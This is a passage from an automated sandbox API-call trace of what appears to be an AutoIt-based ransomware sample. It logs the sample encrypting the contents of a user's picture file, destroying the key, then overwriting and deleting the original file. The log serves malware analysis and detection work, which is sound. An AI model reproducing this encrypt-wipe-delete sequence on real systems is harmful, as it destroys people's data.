wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.755] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbffdf8*, pdwDataLen=0x87e820*=0x7498, dwBufLen=0x74a0 | out: pbData=0xbffdf8*, pdwDataLen=0x87e820*=0x74a0) returned 1 [0191.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.757] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.757] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.757] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.757] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.757] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.757] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.758] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.758] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.764] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.772] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.772] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.772] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0191.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.772] CryptDestroyKey (hKey=0x90af98) returned 1 [0191.773] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.773] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.773] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.773] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.773] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.773] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.773] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.773] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0191.773] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.774] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.774] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.774] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.774] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.774] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.774] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.775] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0191.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.775] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.775] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.775] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.775] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.777] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.777] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xf3d6a560, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xsLu.jpg", cAlternateFileName="")) returned 0x90ae18 [0191.777] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.778] CharLowerBuffW (in: lpsz="byte[29848]", cchLength=0xb | out: lpsz="byte[29848]") returned 0xb [0191.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.778] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.778] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.778] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.778] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.778] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.778] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.778] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.779] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.780] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.780] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xslu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0191.780] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.780] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.780] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.780] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.780] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.781] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.781] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.781] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.781] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.782] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.782] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpFilePart=0x0) returned 0x2f [0191.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0x1782f820, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="xsLu.jpg", cAlternateFileName="")) returned 0x90ae18 [0191.782] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xslu.jpg")) returned 1 [0191.784] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0x1782f820, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="xsLu.jpg", cAlternateFileName="")) returned 0 [0191.784] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0191.787] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: 